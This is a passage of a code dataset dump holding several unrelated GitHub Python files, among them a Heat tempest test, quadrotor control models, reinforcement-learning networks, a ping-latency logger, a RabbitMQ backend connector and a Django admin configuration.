F1\n","repo_name":"mritma/CROMA","sub_path":"trainers/classifier_trainer.py","file_name":"classifier_trainer.py","file_ext":"py","file_size_in_byte":5406,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"78"} +{"seq_id":"4191081296","text":"\"\"\"import random\r\n\r\nfor i in range(1) :\r\nnum=int(input("가위= 0 바위= 1 보= 2\\n\\n중하나를결정하시오"))\r\ncom=random.randrange(0,3,1)\r\nprint("컴퓨터의가위바위보숫자:",com)\r\n\r\nif num>2 or num<0:\r\nprint("잘못입력")\r\nbreak\r\nelif num==com:\r\nprint("비겼습니다\\n")\r\nelif (num==0 and com ==1) or (num==1 and com==2) or (num==2 and com==0):\r\nprint("졌습니다\\n")\r\nelse:\r\nprint("이겼습니다")\"\"\"\r\n\r\na = input()\r\nb = input()\r\nlst = [\"가위\", \"바위\", \"보\"]\r\nresult = \"잘못된 입력입니다.\"\r\n\r\n#a가 가위인 경우\r\nif a == lst[0]:\r\n #b가 낸 것에 따라 결과 설정\r\n if b ==lst[0]:\r\n result = \"Result : Draw\"\r\n elif b == lst[1]:\r\n result = \"Result : Man2 Win!\"\r\n elif b == lst[2]:\r\n result = \"Result : Man1 Win!\"\r\n","repo_name":"jellymj/TIL","sub_path":"16.py","file_name":"16.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"75144706811","text":"import yaml\n\nfrom oslo_log import log\nfrom tempest.lib import decorators\n\nfrom heat_tempest_plugin.common import test\nfrom heat_tempest_plugin.tests.functional import functional_base\n\n\nLOG = log.getLogger(__name__)\n\ntest_template = '''\nheat_template_version: pike\ndescription: Test template for OS::Neutron::ExtraRouteSet\nresources:\n net0:\n type: OS::Neutron::Net\n subnet0:\n type: OS::Neutron::Subnet\n properties:\n network: { get_resource: net0 }\n cidr: 10.0.0.0/24\n router0:\n type: OS::Neutron::Router\n routerinterface0:\n type: OS::Neutron::RouterInterface\n properties:\n router: { get_resource: router0 }\n subnet: { get_resource: subnet0 }\n extrarouteset0:\n type: OS::Neutron::ExtraRouteSet\n properties:\n router: { get_resource: router0 }\n routes:\n - destination: 10.0.10.0/24\n nexthop: 10.0.0.10\n - destination: 10.0.11.0/24\n nexthop: 10.0.0.11\n'''\n\n\ndef _routes_to_set(routes):\n '''Convert a list of extra routes to an unordered data type.'''\n return set(frozenset(r.items()) for r in routes)\n\n\n@test.requires_resource_type('OS::Neutron::ExtraRouteSet')\nclass ExtraRouteSetTest(functional_base.FunctionalTestsBase):\n\n def _create(self, template_routes):\n parsed_template = yaml.safe_load(test_template)\n parsed_template['resources'][\n 'extrarouteset0']['properties']['routes'] = template_routes\n create_template = yaml.safe_dump(parsed_template)\n\n stack_id = self.stack_create(template=create_template)\n\n neutron_router_id = self.get_physical_resource_id(\n stack_id, 'router0')\n neutron_router = self.network_client.show_router(\n neutron_router_id)['router']\n neutron_routes = neutron_router['routes']\n\n self.assertEqual(\n _routes_to_set(template_routes),\n _routes_to_set(neutron_routes))\n\n @decorators.idempotent_id('95b92c1e-d082-11e9-9e5d-9bdb7311b69b')\n def test_create_no(self):\n self._create(template_routes=[])\n\n @decorators.idempotent_id('abda6884-d0b2-11e9-9819-4f4e24c86c92')\n def test_create_one(self):\n self._create(template_routes=[\n {'destination': '10.0.10.0/24', 'nexthop': '10.0.0.10'},\n ])\n\n @decorators.idempotent_id('b3a9b6be-d0b2-11e9-a504-7b3ba6df5e7a')\n def test_create_many(self):\n self._create(template_routes=[\n {'destination': '10.0.10.0/24', 'nexthop': '10.0.0.10'},\n {'destination': '10.0.11.0/24', 'nexthop': '10.0.0.11'},\n ])\n\n def _update(self, template_routes):\n stack_id = self.stack_create(template=test_template)\n\n parsed_template = yaml.safe_load(test_template)\n parsed_template['resources'][\n 'extrarouteset0']['properties']['routes'] = template_routes\n updated_template = yaml.safe_dump(parsed_template)\n self.update_stack(stack_id, updated_template)\n\n neutron_router_id = self.get_physical_resource_id(\n stack_id, 'router0')\n neutron_router = self.network_client.show_router(\n neutron_router_id)['router']\n neutron_routes = neutron_router['routes']\n\n self.assertEqual(\n _routes_to_set(template_routes),\n _routes_to_set(neutron_routes))\n\n @decorators.idempotent_id('6dcf2110-d0b7-11e9-b26b-9f2e5e98d09d')\n def test_update_no(self):\n self._update(template_routes=[])\n\n @decorators.idempotent_id('6e3cea1a-d0b7-11e9-aebc-f7922b833ea5')\n def test_update_one(self):\n self._update(template_routes=[\n {'destination': '10.0.10.0/24', 'nexthop': '10.0.0.10'},\n ])\n\n @decorators.idempotent_id('6e970126-d0b7-11e9-8ec8-afde1e726d0f')\n def test_update_many(self):\n self._update(template_routes=[\n {'destination': '10.0.10.0/24', 'nexthop': '10.0.0.10'},\n {'destination': '10.0.11.0/24', 'nexthop': '10.0.0.11'},\n ])\n","repo_name":"openstack/heat-tempest-plugin","sub_path":"heat_tempest_plugin/tests/functional/test_extra_route_set.py","file_name":"test_extra_route_set.py","file_ext":"py","file_size_in_byte":3951,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"} +{"seq_id":"29493621970","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.preprocessing import PolynomialFeatures\nfrom sklearn.metrics import r2_score\n\n# Create sample data\ndata = {'Time': [1, 2, 3, 4, 5, 6, 7],\n 'Sales': [10, 20, 45, 30, 35, 40, 45]}\n\ndf = pd.DataFrame(data)\n\n# Visualize the data\nplt.scatter(df['Time'], df['Sales'], color='blue')\nplt.xlabel('Time')\nplt.ylabel('Sales')\nplt.title('Time vs. Sales')\nplt.show()\n\n# Using Linear Regression\nX_linear = df[['Time']]\ny_linear = df['Sales']\n\nlinear_model = LinearRegression()\nlinear_model.fit(X_linear, y_linear)\nlinear_y_pred = linear_model.predict(X_linear)\n\nlinear_r2 = r2_score(y_linear, linear_y_pred)\n\nprint(f\"Linear R-squared score: {linear_r2}\")\n\n# Using Polynomial Regression\ndegree = 2 # Degree of the polynomial\npoly = PolynomialFeatures(degree)\nX_poly = poly.fit_transform(X_linear)\n\npoly_model = LinearRegression()\npoly_model.fit(X_poly, y_linear)\npoly_y_pred = poly_model.predict(X_poly)\n\npoly_r2 = r2_score(y_linear, poly_y_pred)\n\nprint(f\"Polynomial R-squared score: {poly_r2}\")\n","repo_name":"Omel1311/USPA_Omelianenko","sub_path":"Regression/PolY_Linier_regr.py","file_name":"PolY_Linier_regr.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40819498503","text":"from __future__ import absolute_import\n\nfrom flask import Blueprint, request, url_for\nfrom sqlalchemy.sql import and_, desc, not_, or_\nfrom sqlalchemy.orm import aliased, contains_eager, joinedload\n\nfrom pyaspora.database import db\nfrom pyaspora.post.models import Post, Share\nfrom pyaspora.post.views import json_posts\nfrom pyaspora.tag.models import PostTag, Tag\nfrom pyaspora.user.session import require_logged_in_user\nfrom pyaspora.utils.rendering import add_logged_in_user_to_data, \\\n redirect, render_response\n\nblueprint = Blueprint('feed', __name__, template_folder='templates')\n\n\n@blueprint.route('/', methods=['GET'])\n@require_logged_in_user\ndef view(_user):\n \"\"\"\n Show the logged-in user their own feed.\n \"\"\"\n from pyaspora.diaspora.models import MessageQueue\n if MessageQueue.has_pending_items(_user):\n return redirect(url_for('diaspora.run_queue', _external=True))\n\n limit = int(request.args.get('limit', 10))\n friend_ids = [f.id for f in _user.contact.friends()]\n clauses = [Post.Queries.shared_with_contact(_user.contact)]\n if friend_ids:\n clauses.append(\n Post.Queries.authored_by_contacts_and_public(friend_ids))\n tag_ids = [t.id for t in _user.contact.interests]\n if tag_ids:\n clauses.append(Tag.Queries.public_posts_for_tags(tag_ids))\n feed_query = or_(*clauses)\n my_share = aliased(Share)\n feed = db.session.query(Share).join(Post). \\\n outerjoin( # Stuff user hasn't hidden\n my_share,\n and_(\n Post.id == my_share.post_id,\n my_share.contact == _user.contact\n )\n ). \\\n outerjoin(PostTag).outerjoin(Tag). \\\n filter(feed_query). \\\n filter(or_(my_share.hidden == None, not_(my_share.hidden))). \\\n filter(Post.parent == None). \\\n order_by(desc(Post.thread_modified_at)). \\\n group_by(Post.id). \\\n options(contains_eager(Share.post)). \\\n options(joinedload(Share.post, Post.diasp)). \\\n limit(limit)\n\n data = {\n 'feed': json_posts([(s.post, s) for s in feed], _user, True),\n 'limit': limit,\n 'actions': {},\n }\n\n if len(data['feed']) >= limit:\n data['actions']['more'] = url_for('feed.view', limit=limit + 10, _external=True)\n\n add_logged_in_user_to_data(data, _user)\n\n return render_response('feed.tpl', data)\n","repo_name":"piraz/pyaspora","sub_path":"pyaspora/feed/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"78"} +{"seq_id":"464344403","text":"import numpy as np\nfrom copy import deepcopy\nfrom typing import Type\nfrom Factories.ModelsFactory.linear_models import LinearizedQuadNoYaw\nfrom Factories.DataManagementFactory.data_holders import DataHolder\nclass QuadTranslationalDynamicsUncertain:\n def __init__(self, parameters_holder: Type[DataHolder]):\n self.parameters_holder = parameters_holder\n self.parameters = parameters_holder.get_data()\n self.m = self.parameters_holder.m\n self.g = self.parameters_holder.g\n self.G = self.m\n self.G_Inv = 1 / self.G\n\n def __call__(self, z, u, u_l1, sigma_hat):\n f = (1 / self.m) * u - np.array([0, 0, 1]) * self.g\n g = (1 / self.m) * (u_l1 + sigma_hat)\n dyn = f + g\n return dyn\n\n def update_parameters(self):\n self.parameters = self.parameters_holder.get_data()\n self.m = self.parameters_holder.m\n self.g = self.parameters_holder.g\n self.G = self.m\n self.G_Inv = 1 / self.G\nclass NonlinearQuadUncertain:\n def __init__(self):\n pass\n def __call__(self):\n pass\n\nclass LinearQuadUncertain(LinearizedQuadNoYaw):\n def __init__(self, parameters_holder: Type[DataHolder],yaw_ss=0.0, x_ref=0.0, y_ref=0.0, z_ref=0.0):\n super().__init__(parameters_holder, Ts=None, yaw_ss=yaw_ss, x_ref=x_ref, y_ref=y_ref, z_ref=z_ref)\n self.A = self.A[3:6, 3:6]\n self.B = self.B[3:6, :]\n self.C = self.C[3:6, 3:6]\n self.D = self.D[3:6, :]\n self.G = self.B\n if isinstance(self.G, np.ndarray):\n self.G_Inv = np.linalg.inv(self.G)\n else:\n self.G_Inv = 1 / self.G\n\n def __call__(self, z, u, u_l1, sigma_hat):\n f = self.A @ z + self.B @ u\n g = self.B @ (u_l1 + sigma_hat)\n dyn = f + g\n return dyn\n def update_parameters(self):\n self.m = self.parameters_holder.m\n self.g = self.parameters_holder.g\n self.parameters = self.parameters_holder.get_data()\n self.B = np.array([[0.0, 0.0, 0.0],\n [0.0, 0.0, 0.0],\n [0.0, 0.0, 0.0],\n [0.0, self.g * np.sin(self.yaw_ss), self.g * np.cos(self.yaw_ss)],\n [0.0, -self.g * np.cos(self.yaw_ss), self.g * np.sin(self.yaw_ss)],\n [1 / self.m, 0.0, 0.0]])\n self.B = self.B[3:6, :]\n self.G = self.B\n if isinstance(self.G, np.ndarray):\n self.G_Inv = np.linalg.inv(self.G)\n else:\n self.G_Inv = 1/self.G\n\nif __name__ == \"__main__\":\n from Factories.ModelsFactory.model_parameters import Z550_parameters\n model = LinearQuadUncertain(Z550_parameters)","repo_name":"froxec/AdaptiveDrone","sub_path":"Factories/ModelsFactory/uncertain_models.py","file_name":"uncertain_models.py","file_ext":"py","file_size_in_byte":2700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"29985060894","text":"import numpy as np\nimport tensorflow as tf\n\nimport utility as U\n\n\nclass Base(object):\n def __init__(self, is_training_tf, use_noisynet, use_layer_norm):\n self._use_noisynet = use_noisynet\n self._use_layer_norm = use_layer_norm\n self._is_training_tf = is_training_tf\n\n def __call__(self, *args):\n return NotImplementedError\n\n def _build_hidden_layer(self, x, layer, activation_fn=None):\n if self._use_noisynet:\n x = U.independent_noisy_layer(x, layer, self._is_training_tf)\n else:\n init = self._ddpg_init(x)\n x = tf.layers.dense(x, layer, kernel_initializer=init, bias_initializer=init)\n if self._use_layer_norm:\n x = tf.contrib.layers.layer_norm(x)\n if activation_fn:\n return activation_fn(x)\n return x\n\n @staticmethod\n def _ddpg_init(x):\n val = 1 / np.sqrt(x.get_shape().as_list()[1])\n return tf.random_uniform_initializer(-val, val)\n\n\nclass Actor(Base):\n def __init__(self, action_dim, max_action, is_training_tf, use_layer_norm, use_noisynet):\n super(Actor, self).__init__(is_training_tf, use_noisynet, use_layer_norm)\n self._max_action = max_action\n self._action_dim = action_dim\n\n def __call__(self, observation_tf, name, reuse=None):\n with tf.variable_scope(name) as vs:\n if reuse:\n vs.reuse_variables()\n out = observation_tf\n\n layers = (200, 100,)\n for i, layer in enumerate(layers):\n with tf.variable_scope('layer_{}'.format(i)):\n out = self._build_hidden_layer(out, layer, tf.nn.relu)\n\n if self._use_noisynet:\n out = U.independent_noisy_layer(\n out, self._action_dim, self._is_training_tf, name='output_layer')\n else:\n out = tf.layers.dense(out, self._action_dim, name='output_layer')\n out = tf.multiply(tf.sigmoid(out), self._max_action)\n\n return out\n\n\nclass Critic(Base):\n def __init__(self, is_training_tf, use_layer_norm, use_noisynet):\n super(Critic, self).__init__(is_training_tf, use_noisynet, use_layer_norm)\n\n def __call__(self, observation_tf, action_tf, name, reuse=None):\n with tf.variable_scope(name) as vs:\n if reuse:\n vs.reuse_variables()\n out = observation_tf\n layers = (200, 100,)\n for i, layer in enumerate(layers):\n with tf.variable_scope('layer_{}'.format(i)):\n if i == 1:\n out = tf.concat((out, action_tf), axis=1)\n out = self._build_hidden_layer(out, layer, tf.nn.relu)\n if self._use_noisynet:\n out = U.independent_noisy_layer(out, 1, self._is_training_tf, name='output_layer')\n else:\n out = tf.layers.dense(out, 1, name='output_layer')\n\n return out\n","repo_name":"SURYAVAMSIPSN/Obstacle-Avoidance-Reinforcement-Learning","sub_path":"agents/networks.py","file_name":"networks.py","file_ext":"py","file_size_in_byte":2958,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"20493785875","text":"import torch\nfrom torch import nn\nimport d2l_pytorch.d2l as d2l\n\n\n# 1 多输⼊通道\n\n# 输入数据含多个通道时,需要构造输入通道数与输入的数据的通道数相同的卷积核\ndef corr2d_multi_in(X, K):\n # 沿着X和K的第0维(通道维)分别计算再计算\n res = d2l.corr2d(X[0, :, :], K[0, :, :])\n for i in range(1, X.shape[0]):\n res += d2l.corr2d(X[i, :, :], K[i, :, :])\n return res\n\n\nX = torch.tensor([[[0, 1, 2], [3, 4, 5], [6, 7, 8]],\n [[1, 2, 3], [4, 5, 6], [7, 8, 9]]])\n\nK = torch.tensor([[[0, 1], [2, 3]], [[1, 2], [3, 4]]])\n\nprint(corr2d_multi_in(X, K))\n\n\n# 2 多输出通道\n\n# 使用相同的输入,使用不同组的卷积核张量创造不同的输出\ndef corr2d_multi_in_out(X, K):\n return torch.stack([corr2d_multi_in(X, k) for k in K])\n\n\nK = torch.stack([K, K + 1, K + 2])\nprint(K.shape)\n# torch.Size([3, 2, 2, 2]) 通道数output,通道数input,高,宽\n\nprint(corr2d_multi_in_out(X, K))\n\n\n# 3 卷积层\n\ndef corr2d_multi_in_out_1x1(X, K):\n c_i, h, w = X.shape\n c_o = K.shape[0]\n X = X.view(c_i, h * w)\n K = K.view(c_o, c_i)\n # mm 全连接层的矩阵乘法\n Y = torch.mm(K, X)\n return Y.view(c_o, h, w)\n\n\nX = torch.rand(3, 3, 3)\nK = torch.rand(2, 3, 1, 1)\n\nY1 = corr2d_multi_in_out_1x1(X, K)\nY2 = corr2d_multi_in_out(X, K)\n\nprint((Y1 - Y2).norm().item() < 1e-6)\nprint((Y1 - Y2).norm().item())\n","repo_name":"Emryshuang/pytorch_study","sub_path":"ch5/5_3.py","file_name":"5_3.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27167549509","text":"from os import listdir\nimport os\n\norigDir = \"C:/Users/t_tor/Unsynced/coco/annotations_boat_old/\"\ntargetDir = \"C:/Users/t_tor/Unsynced/coco/annotations_boat/\"\n\nif not os.path.exists(targetDir):\n os.makedirs(targetDir)\n\ncatOld = '9'\ncatNew = 'boat'\nnameTagOld = '' + catOld + ''\nnameTagNew = '' + catNew + ''\n\t\t\nnFiles = len(listdir(origDir))\nprogress = 0\nfor filename in listdir(origDir):\n\tprogress += 1\n\tprint(str(progress) + '/' + str(nFiles))\n\tf1 = open(origDir+filename, 'r')\n\tf2 = open(targetDir+filename, 'w')\n\tfor line in f1:\n\t\tf2.write(line.replace(nameTagOld,nameTagNew))\n\tf2.close()\n\tf1.close()\n\t\t","repo_name":"tobiastorben/colab_repo","sub_path":"change_cat_name.py","file_name":"change_cat_name.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"34068246726","text":"#Lab Test Sample, Question 2, solution\n\nimport RPi.GPIO as G\nimport time\n\nno_of_small = 0\nno_of_big = 0\n\ndef on_LED(LED, on_seconds, off_seconds):\n if LED == 'red':\n G.output(27, True)\n time.sleep(on_seconds)\n G.output(27, False)\n time.sleep(off_seconds)\n else: #assume Green LED if it's not Red\n G.output(22, True)\n time.sleep(on_seconds)\n G.output(22, False)\n time.sleep(off_seconds) \n \n \n \n\ntry:\n G.setwarnings(False) #supress warning messages\n \n G.setmode(G.BCM)\n G.setup(27, G.OUT)\n G.setup(22, G.OUT)\n G.setup(4, G.IN)\n G.setup(5, G.IN)\n \n print('This prog count the no. of large & small dust particles...')\n \n while True:\n diam = float( input('Enter dust partical diameter (in mico-meter): ') )\n if (diam > 50):\n no_of_big += 1\n print(f\"no. of big dust particles = {no_of_big}\") \n on_LED('red', 1, 0)\n \n print('Press button to undo wrongly entered big diameter...')\n for i in range(150): #give use 3s to undo the wrong diam he just entered \n if G.input(4) == 0: \n no_of_big -=1\n print('Button pressed. ')\n print(f\"no. of big dust particles is: {no_of_big}\")\n break #button already pressed. No need to detech button-press anymore\n else:\n time.sleep(0.02) #0.02s x 150 = 3s \n \n \n else:\n no_of_small += 1\n print(f\"no. of Small dust particles = {no_of_small}\")\n on_LED('green', 1, 0)\n\n print('Press button to undo wrongly entered Small diameter...')\n for i in range(150): #give use 3s to undo the wrong diam he just entered \n if G.input(4) == 0: \n no_of_small -=1\n print('Button pressed. ')\n print(f\"no. of Small dust particles is: {no_of_small}\")\n break #button already pressed. No need to detech button-press anymore\n else:\n time.sleep(0.02) #0.02s x 150 = 3s \n \n \n \nexcept KeyboardInterrupt:\n G.cleanup()\n","repo_name":"MuhdSyahir10/MobilePatient","sub_path":"Practical Test 1/labtest_Sample_Q2.py","file_name":"labtest_Sample_Q2.py","file_ext":"py","file_size_in_byte":2410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"24292122367","text":"#! /usr/bin/env python\n# -*- coding=utf-8 -*-\n\n\"\"\"\nCreated on 2018-10-22\n存储模块到收集模块的代理\n@author: lkw\n\"\"\"\n\nimport zmq\n\n\ndef main():\n try:\n context = zmq.Context(1)\n # 接受存储模块的pull任务\n frontend = context.socket(zmq.PULL)\n frontend.bind(\"tcp://*:5561\")\n\n # 将存储模块的任务分发给收集模块进行存储\n backend = context.socket(zmq.PUSH)\n backend.bind(\"tcp://*:5562\")\n\n # zmq.device()里有个while True\n zmq.device(zmq.STREAMER, frontend, backend)\n except Exception as e:\n print(e)\n print(\"bringing down zmq device\")\n finally:\n # pass\n frontend.close()\n backend.close()\n context.term()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"likeweilikewei/Python-study-demo","sub_path":"zeromq/combination/qlus_dealer_pipeline/streamer_collect.py","file_name":"streamer_collect.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"2287131439","text":"import logging\n\nfrom aiogram import types\nfrom io import BytesIO\n\nfrom aiogram.types import BufferedInputFile\n\nfrom common.keyboards.base import CancelKeyboard\nfrom common.utils.functions import get_now\n\n\nasync def send_file(message: types.Message,\n image_io: BytesIO,\n from_bank,\n to_bank,\n device):\n photo = BufferedInputFile(\n file=image_io.read(),\n filename=f\"{get_now():%d_%m_%y__%H_%M_%S}.PNG\"\n )\n\n await message.answer_document(\n document=photo,\n reply_markup=CancelKeyboard.build()\n )\n\n logging.info(f\"[SCREEN] |{message.from_user.id}| {from_bank}->{to_bank}/{device}\")\n","repo_name":"rSlow/idiotDiaryV2","sub_path":"telegram_bot/apps/free_shaurma/utils/send_files.py","file_name":"send_files.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"43588315576","text":"from Widget.HistoryWindow import HistoryWindow\nfrom PyQt5.QtWidgets import QPushButton, QSizePolicy\n\n# Button in AlgView that open the History Window\nclass HistoryButton(QPushButton):\n \n def __init__(self, model, **kwargs):\n super().__init__(**kwargs)\n\n # Define the model\n self._model = model\n\n # Connect History button to its Window and define its ok_button configuration\n self._window = HistoryWindow(model)\n\n self._name ='history'\n self.setText('{}'.format(self._name))\n self.clicked.connect(lambda : self._window.exec_())\n self.setSizePolicy(QSizePolicy(QSizePolicy.Expanding, QSizePolicy.Fixed))\n\n self._model.resetHistoryWindowSignal.connect(self.resetHistoryWindow)\n\n def resetHistoryWindow(self):\n self._window = HistoryWindow(self._model)","repo_name":"giuliobz/InverseReinforcementLearningApp","sub_path":"Widget/HistoryButton.py","file_name":"HistoryButton.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"36181559155","text":"import json\nimport threading\nimport pika\n\nfrom common.constants import Constants\nfrom common.data_request import DataRequest, MessageType\n\n\nclass BackendServer:\n def __init__(self, app_socket_io_context):\n self.socketio = app_socket_io_context\n self._init_queues()\n threading.Thread(target=self.listen_data_receive).start()\n\n def _create_connection(self):\n host = Constants.QUEUE_HOST\n port = Constants.QUEUE_PORT\n return pika.BlockingConnection(pika.ConnectionParameters(host=host, port=port, heartbeat=0))\n\n def _init_queues(self):\n \"\"\" Initialize the queues. It's redundant if they exist. \"\"\"\n connection = self._create_connection()\n with connection.channel() as channel:\n channel.queue_declare(queue=Constants.QUEUE_NAME_REQUEST, exclusive=False)\n channel.queue_declare(queue=Constants.QUEUE_NAME_RESPOND, exclusive=False)\n connection.close()\n\n def send_data_request(self, data_request: DataRequest):\n connection = self._create_connection()\n try:\n serialized_request = data_request.to_json()\n with connection.channel() as channel:\n channel.basic_publish(\n exchange='',\n routing_key=Constants.QUEUE_NAME_REQUEST,\n body=serialized_request\n )\n print('update_request', 'sent to MLBackend', data_request)\n finally:\n connection.close()\n\n def listen_data_receive(self):\n connection = self._create_connection()\n channel = connection.channel()\n\n def callback(ch, method, properties, body):\n print('update_request', 'Flask got', body)\n deserialized_data = json.loads(body)\n processed_data = deserialized_data[\"processed_data\"]\n serialized_request = deserialized_data[\"original_data\"]\n\n data = json.loads(serialized_request)\n print(data)\n data_request = DataRequest.from_json(data)\n\n self.emit_event(data_request=data_request, processed_data=processed_data)\n\n channel.basic_consume(queue=Constants.QUEUE_NAME_RESPOND, on_message_callback=callback, auto_ack=True)\n try:\n channel.start_consuming()\n finally:\n channel.close()\n connection.close()\n\n def emit_event(self, data_request: DataRequest, processed_data):\n event_mapping = {\n MessageType.PRICE_HISTORY: 'update_price_history',\n MessageType.PRICE_FORECAST: 'update_price_forecast',\n MessageType.SENTIMENT: 'update_sentiment',\n MessageType.ARTICLE_LIST: 'update_article_list',\n MessageType.CURRENT_PRICE: 'update_current_price',\n }\n\n event_name = event_mapping.get(data_request.message_type)\n\n if event_name:\n self.socketio.emit(event_name, processed_data, namespace='/dashboard', to=data_request.ticker)\n print(f\"Emitted event: {event_name}\",\n f\"processed_data={processed_data}\",\n f\"For Data Request: {data_request.to_json()}\")\n else:\n print(f\"Invalid event name: {event_name}\")\n","repo_name":"Idawid/BEng-Thesis-Group-Project","sub_path":"App/app/flask_rabbitmq_connector.py","file_name":"flask_rabbitmq_connector.py","file_ext":"py","file_size_in_byte":3207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"21838107934","text":"#!/usr/bin/python3\n\nfrom influxdb import InfluxDBClient\nfrom datetime import datetime\nfrom pytz import timezone\nfrom pytz import timezone\nimport subprocess\nimport re\nimport datetime\n\nclient = InfluxDBClient(host='153.126.210.53',port=8086,database='ping')\n\n#ping 1.1.1.1\nping1 = subprocess.run([\"ping\",\"1.1.1.1\", \"-c\",\"2\"],stdout=subprocess.PIPE)\n\n#bye -> str\nping1 = ping1.stdout.decode(\"utf-8\")\n\np = r'time=(.*)'\nm = re.search(p, ping1)\nt = m.group(1)\nsec_ping1 = re.sub(\"[^\\d.]\", \"\", t)\nsec_ping1 = float(sec_ping1)\nprint(sec_ping1)\n\n#ping 8.8.8.8\nping2 = subprocess.run([\"ping\",\"8.8.8.8\", \"-c\",\"2\"],stdout=subprocess.PIPE)\n\nping2 = ping2.stdout.decode(\"utf-8\")\n\np = r'time=(.*)'\nm = re.search(p, ping2)\nt = m.group(1)\nsec_ping2 = re.sub(\"[^\\d.]\", \"\", t)\nsec_ping2 = float(sec_ping2)\nprint(sec_ping2)\n\n#ping codeblue.jp\nping3 = subprocess.run([\"ping\",\"codeblue.jp\", \"-c\",\"2\"],stdout=subprocess.PIPE)\n\nping3 = ping3.stdout.decode(\"utf-8\")\n\np = r'time=(.*)'\nm = re.search(p, ping3)\nt = m.group(1)\nsec_ping3 = re.sub(\"[^\\d.]\", \"\", t)\nsec_ping3 = float(sec_ping3)\nprint(sec_ping3)\n\n#db\n#time = datetime.now(timezone('UTC')).isoformat()\n\njson_body = [\n {\n \"measurement\": \"ping\",\n \"time\": datetime.datetime.utcnow(),\n \"fields\": {\n \"ping 1.1.1.1\": sec_ping1,\n \"ping 8.8.8.8\": sec_ping2,\n \"ping codeblue.jp\": sec_ping3\n }\n }\n ]\n\nclient.write_points(json_body)\n\n","repo_name":"ryuji-jp/ping","sub_path":"ping.py","file_name":"ping.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"9895191262","text":"from django.contrib import admin\nfrom django.contrib.admin import AdminSite\n\nfrom admin_web.admin_models import registration_load\n\n\nclass MyAdminSite(AdminSite):\n site_header = \"ARHPG Панель\"\n site_title = \"Админ-панель |\"\n index_title = \" \"\n\n def get_app_list(self, request, *args, **kwargs):\n app_dict = self._build_app_dict(request)\n app_list = sorted(app_dict.values(), key=lambda x: x[\"name\"].lower())\n if app_list:\n new_app = {\"name\": \"Основная\", \"app_label\": \"admin_web\", \"has_module_perms\": True, \"models\": []}\n hide_list = [\"FaqAttachment\", \"CategoryText\", \"NotificationReport\", \"NotificationUser\"]\n\n category_1_app = {\"name\": \"Категория 1\", \"has_module_perms\": True, \"models\": []}\n category_1_list = [\"\"]\n\n for app in app_list:\n for model in app[\"models\"]:\n if model[\"object_name\"] in hide_list:\n pass\n elif model[\"object_name\"] in category_1_list:\n category_1_app[\"models\"].append(app[\"models\"][app[\"models\"].index(model)])\n else:\n new_app[\"models\"].append(app[\"models\"][app[\"models\"].index(model)])\n\n app_list[0] = new_app\n app_list.append(category_1_app) if category_1_app[\"models\"] else None\n return app_list\n\n\nadmin_site = MyAdminSite()\n\nregistration_load()\n","repo_name":"yegoryakubovich/arhpg","sub_path":"admin/admin_web/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"29694207198","text":"import os\nimport glob\nimport pickle\nimport numpy as np\n\n#**** Parameters to set at runtime ****#\nkeys = ['product development','environmental protection','profit'] #base keywords\n#**** Parameters to set at runtime ****#\n\nword_vecs_file = 'word_vecs.dat' #object file containing word vector\nimg_vecs_file = 'img_vecs.dat' #object file that stores the file name and probability vector for each image\nword_img_vecs_file = 'word_img_vecs.dat' #object file that stores the combined vectors of words and images\nin_txt_dir = 'txt' #directory of input files (text of each page)\n\n#Get a dictionary object containing word vectors and image vectors\nwith open(word_vecs_file, 'rb') as f:\n obj = pickle.load(f)\n word_vecs_dict = obj['word_vecs'] #Dictionary of \"word-text:word-vector\"\n\nwith open(img_vecs_file, 'rb') as f:\n obj = pickle.load(f)\n img_vecs_dict = obj['img_vecs'] #Dictionary of \"page ID_image ID: image vector\"\n\n#Prepare a page text file for linking word vectors and page IDs\ntext_dict = {} \nfpath = os.path.join(in_txt_dir,'*')\nfiles = glob.glob(fpath)\nfor file in files:\n with open(file, 'r', encoding='shift-jis') as f_in:\n p_text = f_in.read()\n file_name = os.path.basename(file)\n p_id = os.path.splitext(file_name)[0]\n text_dict[p_id] = p_text #Dictionary of \"page ID: page text\"\n\n#Create a dictionary containing a list of page IDs containing each word\nword_dict = {} \nfor w_key in word_vecs_dict.keys():\n if w_key in keys:\n word_dict[w_key] = [0] #Add \"0\" as page ID for base keywords\n else:\n p_id_list = [int(p_id) for p_id, p_text in text_dict.items() if w_key in p_text] \n word_dict[w_key] = p_id_list\n \n#Combine word vector and image vector\nword_img_list = [] #Tuple list of 